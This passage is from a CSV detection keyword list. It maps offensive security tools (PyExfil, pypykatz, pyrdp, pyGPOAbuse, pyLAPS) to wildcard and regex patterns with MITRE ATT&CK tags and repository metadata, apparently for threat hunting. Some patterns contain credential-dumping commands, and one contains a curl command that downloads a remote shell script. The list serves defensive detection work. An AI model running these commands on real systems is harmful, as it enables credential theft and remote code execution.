"*pyexfil.Comm.AllJoyn*",".{0,1000}pyexfil\.Comm\.AllJoyn.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","","","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","10","8","738","138","2023-02-17T03:12:36Z","2014-11-27T19:06:24Z" "*pyexfil.Comm.DNSoTLS.client*",".{0,1000}pyexfil\.Comm\.DNSoTLS\.client.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","","","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","10","8","738","138","2023-02-17T03:12:36Z","2014-11-27T19:06:24Z" "*pyexfil.Comm.DNSoTLS.server*",".{0,1000}pyexfil\.Comm\.DNSoTLS\.server.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","","","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","10","8","738","138","2023-02-17T03:12:36Z","2014-11-27T19:06:24Z" "*pyexfil.Comm.GQUIC*",".{0,1000}pyexfil\.Comm\.GQUIC.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","","","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","10","8","738","138","2023-02-17T03:12:36Z","2014-11-27T19:06:24Z" "*pyexfil.Comm.jetdirect.communicator*",".{0,1000}pyexfil\.Comm\.jetdirect\.communicator.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","","","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","10","8","738","138","2023-02-17T03:12:36Z","2014-11-27T19:06:24Z" "*pyexfil.Comm.MDNS*",".{0,1000}pyexfil\.Comm\.MDNS.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","","","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","10","8","738","138","2023-02-17T03:12:36Z","2014-11-27T19:06:24Z" "*pyexfil.Comm.NTP_Body.client*",".{0,1000}pyexfil\.Comm\.NTP_Body\.client.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","","","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","10","8","738","138","2023-02-17T03:12:36Z","2014-11-27T19:06:24Z" "*pyexfil.Comm.NTP_Body.server*",".{0,1000}pyexfil\.Comm\.NTP_Body\.server.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","","","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","10","8","738","138","2023-02-17T03:12:36Z","2014-11-27T19:06:24Z" "*pyexfil.HTTPS.https_client*",".{0,1000}pyexfil\.HTTPS\.https_client.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","","","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","10","8","738","138","2023-02-17T03:12:36Z","2014-11-27T19:06:24Z" "*pyexfil.HTTPS.https_server*",".{0,1000}pyexfil\.HTTPS\.https_server.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","","","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","10","8","738","138","2023-02-17T03:12:36Z","2014-11-27T19:06:24Z" "*pyexfil.includes.data_generator*",".{0,1000}pyexfil\.includes\.data_generator.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","","","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","10","8","738","138","2023-02-17T03:12:36Z","2014-11-27T19:06:24Z" "*pyexfil.includes.encryption_wrappers*",".{0,1000}pyexfil\.includes\.encryption_wrappers.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","","","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","10","8","738","138","2023-02-17T03:12:36Z","2014-11-27T19:06:24Z" "*pyexfil.includes.exceptions*",".{0,1000}pyexfil\.includes\.exceptions.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","","","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","10","8","738","138","2023-02-17T03:12:36Z","2014-11-27T19:06:24Z" "*pyexfil.includes.general*",".{0,1000}pyexfil\.includes\.general.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","","","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","10","8","738","138","2023-02-17T03:12:36Z","2014-11-27T19:06:24Z" "*pyexfil.includes.image_manipulation*",".{0,1000}pyexfil\.includes\.image_manipulation.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","","","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","10","8","738","138","2023-02-17T03:12:36Z","2014-11-27T19:06:24Z" "*pyexfil.includes.prepare*",".{0,1000}pyexfil\.includes\.prepare.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","","","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","10","8","738","138","2023-02-17T03:12:36Z","2014-11-27T19:06:24Z" "*PyExfil.MoriRT.com*",".{0,1000}PyExfil\.MoriRT\.com.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","","","Data Exfiltration","https://github.com/ytisf/PyExfil","1","1","N/A","10","8","738","138","2023-02-17T03:12:36Z","2014-11-27T19:06:24Z" "*pyexfil.network*",".{0,1000}pyexfil\.network.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","","","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","10","8","738","138","2023-02-17T03:12:36Z","2014-11-27T19:06:24Z" "*pyexfil.network.DB_LSP.dblsp*",".{0,1000}pyexfil\.network\.DB_LSP\.dblsp.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","","","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","10","8","738","138","2023-02-17T03:12:36Z","2014-11-27T19:06:24Z" "*pyexfil.network.FTP.ftp_exfil*",".{0,1000}pyexfil\.network\.FTP\.ftp_exfil.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","","","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","10","8","738","138","2023-02-17T03:12:36Z","2014-11-27T19:06:24Z" "*pyexfil.network.HTTP_Cookies.http_exfiltration*",".{0,1000}pyexfil\.network\.HTTP_Cookies\.http_exfiltration.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","","","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","10","8","738","138","2023-02-17T03:12:36Z","2014-11-27T19:06:24Z" "*pyexfil.network.HTTPResp.client*",".{0,1000}pyexfil\.network\.HTTPResp\.client.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","","","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","10","8","738","138","2023-02-17T03:12:36Z","2014-11-27T19:06:24Z" "*pyexfil.network.ICMP.icmp_exfiltration*",".{0,1000}pyexfil\.network\.ICMP\.icmp_exfiltration.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","","","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","10","8","738","138","2023-02-17T03:12:36Z","2014-11-27T19:06:24Z" "*pyexfil.network.SpoofIP.spoofIPs_client*",".{0,1000}pyexfil\.network\.SpoofIP\.spoofIPs_client.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","","","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","10","8","738","138","2023-02-17T03:12:36Z","2014-11-27T19:06:24Z" "*pyexfil.physical.qr.generator*",".{0,1000}pyexfil\.physical\.qr\.generator.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","","","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","10","8","738","138","2023-02-17T03:12:36Z","2014-11-27T19:06:24Z" "*pyexfil.physical.wifiPayload.client*",".{0,1000}pyexfil\.physical\.wifiPayload\.client.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","","","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","10","8","738","138","2023-02-17T03:12:36Z","2014-11-27T19:06:24Z" "*pyexfil.Stega.binoffset.binoffset*",".{0,1000}pyexfil\.Stega\.binoffset\.binoffset.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","","","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","10","8","738","138","2023-02-17T03:12:36Z","2014-11-27T19:06:24Z" "*PYEXFIL_DEFAULT_PASSWORD*",".{0,1000}PYEXFIL_DEFAULT_PASSWORD.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","","","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","10","8","738","138","2023-02-17T03:12:36Z","2014-11-27T19:06:24Z" "*pyExfil-latest.zip*",".{0,1000}pyExfil\-latest\.zip.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","","","Data Exfiltration","https://github.com/ytisf/PyExfil","1","1","N/A","10","8","738","138","2023-02-17T03:12:36Z","2014-11-27T19:06:24Z" "*PyExfil-master*",".{0,1000}PyExfil\-master.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","","","Data Exfiltration","https://github.com/ytisf/PyExfil","1","1","N/A","10","8","738","138","2023-02-17T03:12:36Z","2014-11-27T19:06:24Z" "*pygpoabuse * -hashes lm:* -gpo-id *",".{0,1000}pygpoabuse\s.{0,1000}\s\-hashes\slm\:.{0,1000}\s\-gpo\-id\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*pygpoabuse.py*",".{0,1000}pygpoabuse\.py.{0,1000}","offensive_tool_keyword","pyGPOAbuse","python implementation of SharpGPOAbuse","T1566.001 - T1059.006 - T1112","TA0001 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/Hackndo/pyGPOAbuse","1","1","N/A","8","4","305","37","2024-02-18T19:23:57Z","2020-05-10T21:21:27Z" "*pyherion.py*",".{0,1000}pyherion\.py.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*pyhon3 poc.py * curl http://*/shell.sh -o /tmp/shell.sh*",".{0,1000}pyhon3\spoc\.py\s.{0,1000}\scurl\shttp\:\/\/.{0,1000}\/shell\.sh\s\-o\s\/tmp\/shell\.sh.{0,1000}","offensive_tool_keyword","POC","Automated PoC exploitation of CVE-2021-44521","T1548 - T1190","TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/QHpix/CVE-2021-44521","1","0","N/A","N/A","1","9","2","2022-02-24T12:04:40Z","2022-02-24T11:07:34Z" "*pyinstaller netexec.spec*",".{0,1000}pyinstaller\snetexec\.spec.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*pyLAPS.py --action get -d * -u * -p * --dc-ip *",".{0,1000}pyLAPS\.py\s\-\-action\sget\s\-d\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-\-dc\-ip\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*pyLAPS-main*",".{0,1000}pyLAPS\-main.{0,1000}","offensive_tool_keyword","pyLAPS","A simple way to read and write LAPS passwords from linux.","T1136.001 - T1112 - T1078.001","TA0002 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/p0dalirius/pyLAPS","1","1","N/A","9","1","60","11","2024-03-31T12:13:57Z","2021-10-05T18:35:21Z" "*pyMalleableC2*",".{0,1000}pyMalleableC2.{0,1000}","offensive_tool_keyword","cobaltstrike","Quick python utility I wrote to turn HTTP requests from burp suite into Cobalt Strike Malleable C2 profiles","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CodeXTF2/Burp2Malleable","1","1","N/A","10","10","339","32","2023-04-06T15:24:12Z","2022-08-14T18:05:39Z" "*pymultitor*",".{0,1000}pymultitor.{0,1000}","offensive_tool_keyword","pymultitor","Python Multi Threaded Tor Proxy. Did you ever want to be at two different places at the same time? When I asked myself this question. I actually started developing this solution in my mind. While performing penetration tests there are often problems caused by security devices that block the attacking IP","T1071.001 - T1071.004 - T1055.008","TA0002 - TA0003 - TA0008","N/A","N/A","Data Exfiltration","https://github.com/realgam3/pymultitor","1","0","N/A","N/A","6","558","111","2024-02-25T20:40:50Z","2013-09-28T15:55:49Z" "*pypykatz *",".{0,1000}pypykatz\s.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "*pypykatz lsa minidump *",".{0,1000}pypykatz\slsa\sminidump\s.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10","N/A","N/A","N/A","N/A","N/A" "*pypykatz lsa minidump*",".{0,1000}pypykatz\slsa\sminidump.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/skelsec/pypykatz","1","0","N/A","10","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "*pypykatz not installed*",".{0,1000}pypykatz\snot\sinstalled.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","0","N/A","10","10","540","88","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z" "*pypykatz.commons*",".{0,1000}pypykatz\.commons.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "*pypykatz.dpapi*",".{0,1000}pypykatz\.dpapi.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "*pypykatz.exe*",".{0,1000}pypykatz\.exe.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "*pypykatz.git*",".{0,1000}pypykatz\.git.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "*pypykatz.kerberos*",".{0,1000}pypykatz\.kerberos.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "*pypykatz.lsadecryptor*",".{0,1000}pypykatz\.lsadecryptor.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "*pypykatz.py*",".{0,1000}pypykatz\.py.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "*pypykatz.pypykatz*",".{0,1000}pypykatz\.pypykatz.{0,1000}","offensive_tool_keyword","MultiDump","MultiDump is a post-exploitation tool for dumping and extracting LSASS memory discreetly","T1003 - T1564.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/Xre0uS/MultiDump","1","0","N/A","10","5","401","49","2024-04-17T08:06:17Z","2024-02-02T05:56:29Z" "*pypykatz.registry*",".{0,1000}pypykatz\.registry.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "*pypykatz.zip*",".{0,1000}pypykatz\.zip.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/naksyn/Pyramid","1","1","N/A","10","7","613","71","2024-04-03T22:51:28Z","2022-08-13T11:51:37Z" "*pypykatz_handler.py*",".{0,1000}pypykatz_handler\.py.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6490","759","2024-04-29T11:28:16Z","2015-08-30T07:22:51Z" "*pypykatz_rekall.py*",".{0,1000}pypykatz_rekall\.py.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "*pypykatzClass*",".{0,1000}pypykatzClass.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*pypykatzfile*",".{0,1000}pypykatzfile.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*pypykatz-master.zip*",".{0,1000}pypykatz\-master\.zip.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "*Pyramid-main.zip*",".{0,1000}Pyramid\-main\.zip.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/naksyn/Pyramid","1","1","N/A","10","7","613","71","2024-04-03T22:51:28Z","2022-08-13T11:51:37Z" "*pyrdp.core.mitm*",".{0,1000}pyrdp\.core\.mitm.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*pyrdp.enum.rdp*",".{0,1000}pyrdp\.enum\.rdp.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*pyrdp.logging.log*",".{0,1000}pyrdp\.logging\.log.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*pyrdp.parser.rdp*",".{0,1000}pyrdp\.parser\.rdp.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*pyrdp_output -*",".{0,1000}pyrdp_output\s\-.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*pyrdp_scapy.py*",".{0,1000}pyrdp_scapy\.py.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","1","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*pyrdp-clonecert.py*",".{0,1000}pyrdp\-clonecert\.py.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","1","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*pyrdp-convert.py*",".{0,1000}pyrdp\-convert\.py.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","1","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*pyrdp-mitm *",".{0,1000}pyrdp\-mitm\s.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*pyrdp-mitm.py*",".{0,1000}pyrdp\-mitm\.py.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","1","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*pyrdp-player.py*",".{0,1000}pyrdp\-player\.py.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","1","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*pyrit -e * create_essid*",".{0,1000}pyrit\s\-e\s.{0,1000}\screate_essid.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation 